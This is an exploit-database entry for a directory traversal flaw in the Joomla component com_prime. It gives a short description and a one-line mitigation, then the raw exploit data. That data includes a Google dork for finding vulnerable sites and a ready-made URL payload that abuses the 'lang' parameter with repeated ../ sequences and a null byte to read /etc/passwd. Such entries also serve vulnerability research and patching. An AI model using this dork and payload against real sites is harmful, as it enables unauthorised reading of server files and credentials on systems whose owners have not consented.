header-logo
Suggest Exploit
vendor:
com_prime
by:
FL0RiX
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: com_prime
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_prime

A directory traversal vulnerability exists in Joomla Component com_prime, which allows an attacker to read arbitrary files on the server. This is due to the application not properly sanitizing user-supplied input to the 'lang' parameter. An attacker can leverage this vulnerability to read sensitive files on the server, such as the /etc/passwd file.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

@~~=======================================~~@
@~~=Script   : Joomla Component com_prime

@~~=Author   : FL0RiX

@~~=Bug Type : Directory Traversal

@~~=Dork : inurl:"index.php?option=com_prime"

@~~=Note: Kimseye Hakettiginden Fazla Deger Vermeyeceksin.

@~~=======================================~~@

@~~=Vuln.

http:/server/ [Yol] /index.php?option=com_prime&lang=../../../../../../../../../../etc/passwd%00